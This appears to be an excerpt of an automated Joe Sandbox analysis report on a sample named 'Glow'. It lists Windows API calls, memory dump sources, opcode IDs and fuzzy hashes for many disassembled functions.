                                                                                                                                                                          • Instruction Fuzzy Hash: 4D115E71D00569E7CF02EFA6E9496EFFB78BF09711F1141A5D541B2180CB305650CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041888E
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 004188A6
                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 004188CA
                                                                                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004188E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 357397906-0
                                                                                                                                                                          • Opcode ID: 2280ad6bdfff98689a3b658aece5f2c49b37693008a61e095c93190fa6f07c7d
                                                                                                                                                                          • Instruction ID: 79bb0c353357214307aa977bfdc771634d95fc08ae741505da39df9c425db5b9
                                                                                                                                                                          • Opcode Fuzzy Hash: 2280ad6bdfff98689a3b658aece5f2c49b37693008a61e095c93190fa6f07c7d
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D1112B9D00209EFDB41DFA8C884AEEBBF5FB08314F508166E915E3210D735AA95DF54
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003E3712
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 003E3723
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 003E372A
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 003E3731
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                                          • Opcode ID: b73a3c5dae2dc41e4919fb50276c542b0597daad3738e242240aa037e4461e1f
                                                                                                                                                                          • Instruction ID: 6ee9e63f56908e775c0179c91b000f465a9835f03a977b53edef5175d0fcf140
                                                                                                                                                                          • Opcode Fuzzy Hash: b73a3c5dae2dc41e4919fb50276c542b0597daad3738e242240aa037e4461e1f
                                                                                                                                                                          • Instruction Fuzzy Hash: 75E092F19012747BDB2017A39C4DEEB7F6CDF42BA1F004125F105D20C0DAA4C940C2B1
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00381F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00381F87
                                                                                                                                                                            • Part of subcall function 00381F2D: SelectObject.GDI32(?,00000000), ref: 00381F96
                                                                                                                                                                            • Part of subcall function 00381F2D: BeginPath.GDI32(?), ref: 00381FAD
                                                                                                                                                                            • Part of subcall function 00381F2D: SelectObject.GDI32(?,00000000), ref: 00381FD6
                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 004192E3
                                                                                                                                                                          • LineTo.GDI32(?,?,?), ref: 004192F0
                                                                                                                                                                          • EndPath.GDI32(?), ref: 00419300
                                                                                                                                                                          • StrokePath.GDI32(?), ref: 0041930E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                          • Opcode ID: 71a41632467bc6532dd2ed8280880a0b5b7475266684d659f951902d0883813d
                                                                                                                                                                          • Instruction ID: 9b798a30be21266157c5428e711813e4bd07de381d83fde930515f6e436e5bc2
                                                                                                                                                                          • Opcode Fuzzy Hash: 71a41632467bc6532dd2ed8280880a0b5b7475266684d659f951902d0883813d
                                                                                                                                                                          • Instruction Fuzzy Hash: 6BF0BE72101228BBDB122F50AC0EFCE3F59AF0E324F048011FA11211E2C3B895628BED
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 003821BC
                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 003821C6
                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 003821D9
                                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 003821E1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Color$ModeObjectStockText
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4037423528-0
                                                                                                                                                                          • Opcode ID: 31d3cd50848a74925205a2d3eaf3503193e7fcd14bd5115ade3ef9d254178868
                                                                                                                                                                          • Instruction ID: fd5df4f4779ec3a7fba752b85936bbb00b0b0687a6d947d37567aee42641d63a
                                                                                                                                                                          • Opcode Fuzzy Hash: 31d3cd50848a74925205a2d3eaf3503193e7fcd14bd5115ade3ef9d254178868
                                                                                                                                                                          • Instruction Fuzzy Hash: DEE06571640640BADB215F74AC09BE93B11AB16335F14C229F7F6940E1C77246409B15
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 003DEC36
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 003DEC40
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003DEC60
                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 003DEC81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                          • Opcode ID: b344cfe2116c9dc5379b921b972609e82658ec45963e67958804be1aae8080ba
                                                                                                                                                                          • Instruction ID: 6a2cbcafa5301bcdc8dd70ed556a363f53b8c53a454dfbdf10dc5ec77e54487c
                                                                                                                                                                          • Opcode Fuzzy Hash: b344cfe2116c9dc5379b921b972609e82658ec45963e67958804be1aae8080ba
                                                                                                                                                                          • Instruction Fuzzy Hash: 7FE01AB1C00204DFCF41AFA0D908A9DBFB5EB08310F10C469E80AE7250C73859019F04
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 003DEC4A
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 003DEC54
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 003DEC60
                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 003DEC81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2889604237-0
                                                                                                                                                                          • Opcode ID: cedcc0032a350797b1e4e0befa2407e71f17bc971ddab812019e987ce19884d3
                                                                                                                                                                          • Instruction ID: 4fd0c1241c51f007bafff168bbfcf55edce63c3d2cb3adfac060e34ce3215e1f
                                                                                                                                                                          • Opcode Fuzzy Hash: cedcc0032a350797b1e4e0befa2407e71f17bc971ddab812019e987ce19884d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 19E012B0C00204EFCF41AFA0C808A9DBBB5AB08310B108469E80AE3250CB386A019F08
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: LoadString
                                                                                                                                                                          • String ID: @COM_EVENTOBJ$bn>
                                                                                                                                                                          • API String ID: 2948472770-3997017919
                                                                                                                                                                          • Opcode ID: ab7d48d96b15d67f36c6d0cd3b1d5ea58c7258dd825daa080f88cd6142f99993
                                                                                                                                                                          • Instruction ID: 5765bfdb4967196f77af68113a20de922170407f23cf1dbdb1311c4920957aa8
                                                                                                                                                                          • Opcode Fuzzy Hash: ab7d48d96b15d67f36c6d0cd3b1d5ea58c7258dd825daa080f88cd6142f99993
                                                                                                                                                                          • Instruction Fuzzy Hash: 38F16972A082009FD726DF14D881B6AB7E0BF84704F14895EF58A9B361D775EE49CB83
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003A05B2: EnterCriticalSection.KERNEL32(0045170C,?,00000000,?,0038D22A,00453570,00000001,00000000,?,?,003FF023,?,?,00000000,00000001,?), ref: 003A05BD
                                                                                                                                                                            • Part of subcall function 003A05B2: LeaveCriticalSection.KERNEL32(0045170C,?,0038D22A,00453570,00000001,00000000,?,?,003FF023,?,?,00000000,00000001,?,00000001,00452430), ref: 003A05FA
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 003A0413: __onexit.LIBCMT ref: 003A0419
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00408658
                                                                                                                                                                            • Part of subcall function 003A0568: EnterCriticalSection.KERNEL32(0045170C,00000000,?,0038D258,00453570,003C27C9,00000001,00000000,?,?,003FF023,?,?,00000000,00000001,?), ref: 003A0572
                                                                                                                                                                            • Part of subcall function 003A0568: LeaveCriticalSection.KERNEL32(0045170C,?,0038D258,00453570,003C27C9,00000001,00000000,?,?,003FF023,?,?,00000000,00000001,?,00000001), ref: 003A05A5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                          • String ID: Variable must be of type 'Object'.$bn>
                                                                                                                                                                          • API String ID: 535116098-3159797878
                                                                                                                                                                          • Opcode ID: ff3958cf5a26f0aa33944e0a473e3fae980302d14975cc7c0eec6efb023c2f23
                                                                                                                                                                          • Instruction ID: 9ffd2446afcc68088244fad5a76598a71c7c89338a2af4eadad7da8d41949512
                                                                                                                                                                          • Opcode Fuzzy Hash: ff3958cf5a26f0aa33944e0a473e3fae980302d14975cc7c0eec6efb023c2f23
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F918F74A00209EFCB04EF54D9819AEB7B1FF44304F50806EF946AB392DB75AE41CB59
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003841EA: _wcslen.LIBCMT ref: 003841EF
                                                                                                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 003F5919
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Connection_wcslen
                                                                                                                                                                          • String ID: *$LPT
                                                                                                                                                                          • API String ID: 1725874428-3443410124
                                                                                                                                                                          • Opcode ID: 1c9d47b46705aed4f942efe74147db040c404d508a2c7078a97cf64b886c90b2
                                                                                                                                                                          • Instruction ID: e44f30d492c06d431dd0cae89970340f62d4870a62d40cd0498ad8b52f830769
                                                                                                                                                                          • Opcode Fuzzy Hash: 1c9d47b46705aed4f942efe74147db040c404d508a2c7078a97cf64b886c90b2
                                                                                                                                                                          • Instruction Fuzzy Hash: 68918E75A00608DFCB16DF54C4C4EAABBF5AF44304F198099EA499F362C775EE86CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • OleSetContainedObject.OLE32(?,00000001), ref: 003E58AF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ContainedObject
                                                                                                                                                                          • String ID: 0$E$Container
                                                                                                                                                                          • API String ID: 3565006973-1372137275
                                                                                                                                                                          • Opcode ID: 12ac26dc3c191d28c33ca4ea0097aa437e0ab9cbba33e696246a2b370491a237
                                                                                                                                                                          • Instruction ID: 2bbe060fdd31caabdd8191decefbda2586fa39960f17ff76ae0b381672fbb45c
                                                                                                                                                                          • Opcode Fuzzy Hash: 12ac26dc3c191d28c33ca4ea0097aa437e0ab9cbba33e696246a2b370491a237
                                                                                                                                                                          • Instruction Fuzzy Hash: 51815AB0600611EFDB15CF55C884AAABBF9FF49714F20856EF94A8B291DB70E841CB64
                                                                                                                                                                          APIs
                                                                                                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 003AE67D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorHandling__start
                                                                                                                                                                          • String ID: pow
                                                                                                                                                                          • API String ID: 3213639722-2276729525
                                                                                                                                                                          • Opcode ID: 379de13b9b5a5e8fac3ab5f2a2b9989115489003bd60f23a43bec9d8b8539b63
                                                                                                                                                                          • Instruction ID: 764b76224fbeb7c5398c0c7d316f37b7f30d4efc65f6e8e86d4675848454f434
                                                                                                                                                                          • Opcode Fuzzy Hash: 379de13b9b5a5e8fac3ab5f2a2b9989115489003bd60f23a43bec9d8b8539b63
                                                                                                                                                                          • Instruction Fuzzy Hash: 7751AD61F0A10296C713BB18DE013EA3BACEB51745F314D28F19186AF9DF358C86DA46
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: #
                                                                                                                                                                          • API String ID: 0-1885708031
                                                                                                                                                                          • Opcode ID: 6424200cc7176cd86231bd9b4c37af48824a82f1366d5a060a9db231198b998d
                                                                                                                                                                          • Instruction ID: 4a317df5b3f7baf8a8a96eea3eecf1d5b6b952907084489c7d530b095cebacae
                                                                                                                                                                          • Opcode Fuzzy Hash: 6424200cc7176cd86231bd9b4c37af48824a82f1366d5a060a9db231198b998d
                                                                                                                                                                          • Instruction Fuzzy Hash: 235105725042479FCF17EF28E441ABA7BB4EF16310F66815AF8919B390DB34AD42CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • Sleep.KERNEL32(00000000), ref: 0039F6DB
                                                                                                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0039F6F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 2783356886-2766056989
                                                                                                                                                                          • Opcode ID: 95dfef3324604abe8982d2c348674575f69becdc6d1d52c401aeb590c1917762
                                                                                                                                                                          • Instruction ID: 1efaab679fef0cff8bec703ffef586d7823c7aa90f57390ca599a3beb9d8faef
                                                                                                                                                                          • Opcode Fuzzy Hash: 95dfef3324604abe8982d2c348674575f69becdc6d1d52c401aeb590c1917762
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A5148719087489BD321AF10DC86BAFBBF8FF85300F81889DF1D9451A1EB708529CB66
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003FDB75
                                                                                                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 003FDB7F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CrackInternet_wcslen
                                                                                                                                                                          • String ID: |
                                                                                                                                                                          • API String ID: 596671847-2343686810
                                                                                                                                                                          • Opcode ID: fa60b55192845b6f7eeee0a5611f7f077aa101d3289ad45bc124a82efba3f780
                                                                                                                                                                          • Instruction ID: f3f3d9cccc6f44e4b6d17cf180c2db9d2f29e4d7230434f714830c92beb445fd
                                                                                                                                                                          • Opcode Fuzzy Hash: fa60b55192845b6f7eeee0a5611f7f077aa101d3289ad45bc124a82efba3f780
                                                                                                                                                                          • Instruction Fuzzy Hash: 67316F71C01219ABCF06EFA4CC85EEEBFB9FF05304F100065F915AA166EB719A06CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 004140BD
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 004140F8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$DestroyMove
                                                                                                                                                                          • String ID: static
                                                                                                                                                                          • API String ID: 2139405536-2160076837
                                                                                                                                                                          • Opcode ID: 4b1fbb8257d8eec77e34d0d73c28ca0cd458d247b965b26a8b9a1ee1ad7b513f
